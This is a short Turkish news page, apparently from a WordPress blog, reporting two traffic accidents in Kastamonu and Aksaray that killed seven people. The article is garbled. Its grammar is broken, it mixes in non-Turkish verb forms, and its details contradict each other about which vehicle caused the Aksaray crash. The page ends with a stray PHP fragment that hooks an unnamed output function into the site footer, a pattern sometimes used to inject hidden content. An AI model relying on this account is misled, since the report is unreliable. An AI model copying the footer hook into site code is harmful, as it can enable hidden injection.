Türkiye’de Korkunç Trafik Kazası

Bugün iki trafik kazasında 7 kişi öldü, 43 kişi yaralandı.Bugün Türkiye’nin farklı iki bölgesinde meydana gelen trafik kazasında genellikle 7 kişi öldü, 43 kişi de yaralandı aldı.

Kastamonu şehrinin Araç kasabasında, diğeri ise Ağsaray kentinde meydana geldi.
Öyle ki, Kastamonu’da kamyon ile otomobilin çarpışması sonucu 6 kişi öldü, 1 kişi ise ağır yaralandı ölüler ambulanslar ile hastaneye yerleştirildi. Alınan bilgiye göre, yaralanan şahıs kamyonun sürücüsüdür. Ölen altı kişi ise otomobilde bulunan kişilerdir. Olayın henüz neden meydana geldiği bilinmemektedir. Araştırma yapılır.

Ağsaray da ise otobüsün TIR’a çarpması sonucu ilk bilgiye göre, 1 kişi öldü, 42 kişi de yaralandı. Ölenin 3 yaşındaki çocuk olduğu söyleniyor. Yaralılar ise hemen Ağsaray Devlet Hastanesi’ne aparılıblar.

Olay Nevşehir den Zonguldak giden yol üzerinde. Kazanın neden oluşumu tam olarak açıklanmasa da, ilk belirlemelere göre, olaya neden otobüs sürücüsünün otobüsü hızlı sürmesinden dolayı kontrolden çıkan otomobil karşı şeride girdi.

Yaklaşık admin

Ben Harun Güçlü 1988 Trabzon akçaabat doğumluyum küçük yaşlarımdan beri araştırmacı ve bilgi paylaşımcı bir insandım, tek hedefim habercilikte doruğa ulaşmak

Ayrıca kontrol

Gaziantep’te Suriyeli bir çocuk 50 TL için öldürüldü

Gaziantep’te Cengiz P. isimli şahıs, Suriyeli olduğu öğrenilen 12 yaşındaki Fahri Ali’yi 50 TL için ...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

function burakk(){ echo ' } add_action("wp_footer",'burakk');